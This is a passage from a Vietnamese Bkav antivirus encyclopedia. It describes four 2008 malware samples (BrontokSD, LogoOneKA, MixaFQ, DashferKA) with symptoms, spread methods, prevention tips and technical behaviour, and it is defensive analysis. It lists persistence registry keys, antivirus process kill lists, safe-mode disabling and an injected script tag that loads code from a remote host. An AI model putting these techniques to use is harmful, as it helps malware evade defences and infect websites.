1. Trang chủ
  2. » Công Nghệ Thông Tin

Bách Khoa Antivirus-Đặc Điểm Các Virus part 26 pot

5 264 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 5
Dung lượng 148,1 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

 Tắt các chương trình AntiVirus và các dịch vụ hệ thống của Windows  Không vào được một vài trang web bảo mật và antivirus.. Thanks," Cách phòng tránh:  Không nên vào các trang we

Trang 1

35 Bkav2004 - Phát hành lần thứ 2 ngày 17/11/2008, cập nhật

G4eY5F, SkypeN, BrontokSD, FakeExpI, Itdead, MsFoxR

Malware cập nhật mới nhất:

Tên malware: W32.BrontokSD.Worm

Thuộc họ: W32.Brontok.Worm

Loại: Worm

Xuất xứ: Nước ngoài

Ngày phát hiện mẫu: 17/11/2008

Kích thước: 147 Kb

Mức độ phá hoại: Trung bình

Nguy cơ:

 Làm giảm mức độ an ninh của hệ thống

Hiện tượng:

 Sửa registry

 Tắt các chương trình AntiVirus và các dịch vụ hệ thống

của Windows

 Không vào được một vài trang web bảo mật và

antivirus

 Mất menu FoderOptions

Cách thức lây nhiễm:

 Phát tán qua trang Web

 Phát tán qua email : Với Subject là : "My Best Photo"

Hoặc "Fotoku yg Paling Cantik"

Kèm theo nội dung :

"Hi,

I want to share my photo with you

Wishing you all the best

Regards,"

Hoặc : "Hi,

Aku lg iseng aja pengen kirim foto ke kamu

Jangan lupain aku ya ! Thanks,"

Cách phòng tránh:

 Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại

 Không nên mở file đính kèm không rõ nguồn gốc, đặc biệt là các file có đuôi exe com pif và bat

Mô tả kỹ thuật:

 Tạo ra các bản sao của nó:

o %Sysdir%\cmd-brontok.exe

o %Windir%\Shellnew\[RandomName]

o %Documents%\[UserName]\Local Settings\Application Data\csrss.exe

o %Documents%\[UserName]\Local Settings\Application Data\lsass.exe

o %Documents%\[UserName]\Local Settings\Application Data\br7911on.exe

o %Documents%\[UserName]\Local Settings\Application Data\services.exe

o %Documents%\[UserName]\Local Settings\Application Data\winlogon.exe

o %Documents%\[UserName]\Local Settings\Application Data\inetinfo.exe

 Ghi giá trị:

o "Bron-Spizaetus" vào key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

để chạy virus lúc hệ thống khởi động

o "Tok-Cirrhatus-3444" vào key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

để chạy virus lúc hệ thống khởi động

Trang 2

 Sửa file hosts ngăn không cho người dùng truy cập vào

một vài trang web bảo mật

 Sửa key không cho người dùng sử dụng một vài tiện

ích của windows và làm mất menu FolderOptions

 Tắt các process và các cửa sổ có chứa 1 trong các xâu :

peid , task view, telanjang, bugil, cewe, naked, porn, sex,

alwil, wintask,

folder option,worm, trojan, avira, windows script,

commander, pc-media, killer, ertanto,

anti, ahnlab, nod32, hijack, sysinter, aladdin, panda, trend,

cillin,

mcaf, avast, bitdef, machine, movzx, kill, washer, remove,

wscript, diary,

untukmu, kangen, sstray, Alicia, Mariana, Dian, foto, zlh,

Anti, mspatch,

siti, virus, services.com, ctfmon, nopdb, opscan, vptray,

update, lexplorer, iexplorer,

nipsvc, njeeves, cclaw, nvcoas, aswupdsv, ashmaisv, systray,

riyani, xpshare, syslove,

tskmgr, ccapps, ash, avg, poproxy, mcv

 Tìm các địa chỉ mail trong máy, đồng thời gửi mail có

đính kèm virus tới các địa chỉ vừa tìm được

Chuyên viên phân tích : Nguyễn Quốc Nhân

36 Bkav2009 (20/11/2008) cập nhật lần thứ 1: LogoOneKA,

MegabyA

Malware cập nhật mới nhất:

Tên malware: W32.LogoOneKA.PE

Thuộc họ: W32.LogoOne.PE

Loại: PE

Xuất xứ: Trung Quốc

Ngày phát hiện mẫu: 19/11/2008

Kích thước: 61Kb

Mức độ phá hoại: Cao Nguy cơ:

 Ăn cắp thông tin cá nhân

 Lây file

 Làm giảm mức độ bảo mật của hệ thống

Hiện tượng:

 Sửa registry

 Dừng các chương trình diệt virus

 Làm chậm hệ thống

 Mất icon của các file exe

Cách thức lây nhiễm:

 Phát tán qua trang web, phần mềm miễn phí

 Phát tán qua các tài nguyên chia sẻ mạng nội bộ

Cách phòng tránh:

 Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại

 Không nên mở file đính kèm không rõ nguồn gốc, đặc biệt là các file có đuôi exe com pif và bat

 Không nên share full các ổ đĩa, thư mục trong mạng nội

bộ, nên đặt password truy cập nếu muốn chia sẻ quyền sửa và tạo file

Mô tả kỹ thuật:

 Ghi giá trị

"load" = %WinDir%\uninstall\rundl132.exe vào key

Trang 3

HKLM\Software\Microsoft\Windows\CurrentVersion\Run để

chạy virus mỗi khi windows được khởi động

 Kiểm tra đã tồn tại key

[HKLM\SOFTWARE\Soft\DownloadWWW]

với giá trị "auto" = "1" làm dấu hiệu xác định xem virus lây

nhiễm chưa

 Copy chính nó vào

%Windir%\ Logo1_.exe

%Windir%\uninstall\rundl132.exe

 Drop ra file: %WinDir%\RichDll.dll

 Ghi ngày lây nhiễm vào file C:\_desktop.ini

 Lây file bằng cách ghi code virus vào trước file gốc

 Lây vào toàn bộ các file exe trong ổ cứng từ C đến Y

 Lây qua mạng nội bộ bằng cách copy và lây vào các

file exe trong các thư mục shared

 Không lây những file đường dẫn có chứa:

• \Program Files\

• Common Files

• ComPlus Applications

• Documents and Settings

• InstallShield Installation Information

• Internet Explorer

• Messenger

• Microsoft Frontpage

• Microsoft Office

• Movie Maker

• MSN

• MSN Gaming Zone

• NetMeeting

• Outlook Express

• Recycled

• system

• System Volume Information

• system32

• windows

• Windows Media Player

• Windows NT

• WindowsUpdate

• winnt

 Kill các services và chương trình diệt virus:

• "Kingsoft AntiVirus Service"

• EGHOST.EXE

• IPARMOR.EXE

• KAVPFW.EXE

• MAILMON.EXE

• mcshield.exe

• RavMon.exe

• RavMonClass

• Ravmond.EXE

• regsvc.exe

Chuyên viên phân tích : Nguyễn Công Cường Một số malware đáng chú ý cập nhật cùng ngày:

W32.ARPspoofT.Trojan, W32.FarfliKA.Rootkit, W32.FialaKA.Worm, W32.MegabyA.Worm, W32.VtLightIA.PE, W32.KxvoET.Worm, W32.WinbetTT.Trojan, W32.AlureonB.Trojan, W32.ArfuBot.Trojan, W32.CimusCD.Rootkit, W32.MSFoxCB.Worm

Trang 4

37 Bkav2011 (21/11/2008) cập nhật lần thứ 1: Suchop,

MixaFQ

Malware cập nhật mới nhất:

Tên malware: W32.MixaFQ.Worm

Thuộc họ: W32Mixa.Worm

Loại: Worm

Xuất xứ: Việt Nam

Ngày phát hiện mẫu: 20/11/2008

Kích thước: 3608Kb

Mức độ phá hoại: Trung bình

Nguy cơ:

 Làm giảm mức độ an ninh của hệ thống

Hiện tượng:

 Sửa registry

 Bị logoff máy tính khi sử dụng 1 vài tiện ích của

windows như: TaskMgr, RegistryTool,

 Không hiển thị được file ẩn và file hệ thống

Cách thức lây nhiễm:

 Phát tán qua trang web

 Tự động lây nhiễm vào USB

Cách phòng tránh:

 Không nên vào các trang web cung cấp các phần mềm

crack, hack, các trang web đen, độc hại

 Không nên mở ổ USB bằng cách nháy kép vào biểu

tượng ổ đĩa

Mô tả kỹ thuật:

 Ghi giá trị

"Userinit " = %SysDir%\systemio.exe

vào key HKLM\ \CurrentVersion\Winlogon\

và Virus=%WinDir%\Mixa.exe

Vào key HKLM\ \CurrentVersion\Run để virus được kích hoạt mỗi khi Windows khởi động

 Copy bản thân thành các file :

%SysDir%\systemio.exe

%WinDir%\Mixa.exe

 Liên tục check các process, nếu thấy process có chứa 1 trong các xâu : taskmgr, procexp, regedit, mmc thì đóng tất cả các ứng dụng và LogOff máy tính

 Copy bản thân thành file có tên "Mixa_I.exe" kèm theo file autorun.inf vào tất cả các ổ đĩa

 Liên tục ghi key làm người dùng không hiện được các file

ẩn và file hệ thống

Chuyên viên phân tích : Nguyễn Công Cường Một số malware đáng chú ý cập nhật cùng ngày:

W32.ConthinA.Worm, W32.FialaKC.Worm, W32.HtmInfectB.Trojan, W32.Suchop.PE, W32.JvsoftLJ.Worm, W32.JvsoftLK.Worm, W32.OngameFS.Trojan, W32.RsnetJZ.Trojan, W32.Lin32.Trojan, W32.Sobicyt.Adware, W32.Soxpeca.Adware,

38 Bkav2013 - Phát hành lần thứ 1 ngày 22/11/2008, cập nhật

DashferKA, VtLightKA, CkvoHGV, ResycleB, Cmhot

Malware cập nhật mới nhất:

Tên malware: W32 DashferKA.PE

Thuộc họ: W32.Dashfer.PE

Loại: PE

Trang 5

Xuất xứ: Trung Quốc

Ngày phát hiện mẫu: 21/11/2008

Kích thước: 165Kb

Mức độ phá hoại: Cao

Nguy cơ:

 Làm giảm mức độ an ninh của hệ thống

Hiện tượng:

 Sửa registry

 Không vào được chế độ safe mode của Windows

 Xuất hiện popup các trang web tiếng Trung Quốc

 Mất checkbox để hiển thị các file hệ thống

Cách thức lây nhiễm:

 Phát tán qua trang web

 Tự động lây nhiễm qua USB

 Lây qua các file thực thi

Cách phòng tránh:

 Không nên vào các trang web cung cấp các phần mềm

crack, hack, các trang web đen, độc hại

 Không nên mở ổ USB bằng cách nháy kép vào biểu

tượng ổ đĩa

Mô tả kỹ thuật:

 Xóa các key :

HKLM\ \Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\ \Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}

làm cho máy tính không khởi động được trong chế độ

safemode

HKLM\Software\Microsoft\Windows\CurrentVersion\Run

 Copy bản thân thành file có tên "lsass.exe" vào thư mục

%SysDir%\Com, và ~.exe vào thư mục Startup

để virus được thực thi khi khởi đông hệ thống

 Tạo Mutex: CNJBlaipbofF để chỉ 1 file virus chạy trên 1 máy

 Dump ra các file :

%SysDir%\Com\smss.exe

%SysDir%\Com\netcfg.dll

%SysDir%\Com\netcfg.000

%SysDir%\Drivers\Alg.exe

 Sửa key làm mất checkbox để hiển thị các file hệ thống

 Copy bản thân thành file có tên : "pagefile.pif" kèm theo file autorun.inf vào tất cả các ổ đĩa

 Tắt các process có chứa một trong các xâu sau : rav, avp, twister, kv, watch, kissvc, scan, guard

 Thêm vào cuối các file có đuôi: jsp, php, spx, asp, tml, htm tìm thấy trên máy trừ ổ đĩa hệ thống (kể cả trong các file nén rar) đoạn script :

<script src="http://js.k01[removed].com/01.asp"></script>

 Lây nhiễm vào các file thực thi tìm được trong máy trừ ổ đĩa hệ thống

Chuyên viên phân tích : Nguyễn Ngọc Dũng

Ngày đăng: 02/07/2014, 18:20

Xem thêm

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

🧩 Sản phẩm bạn có thể quan tâm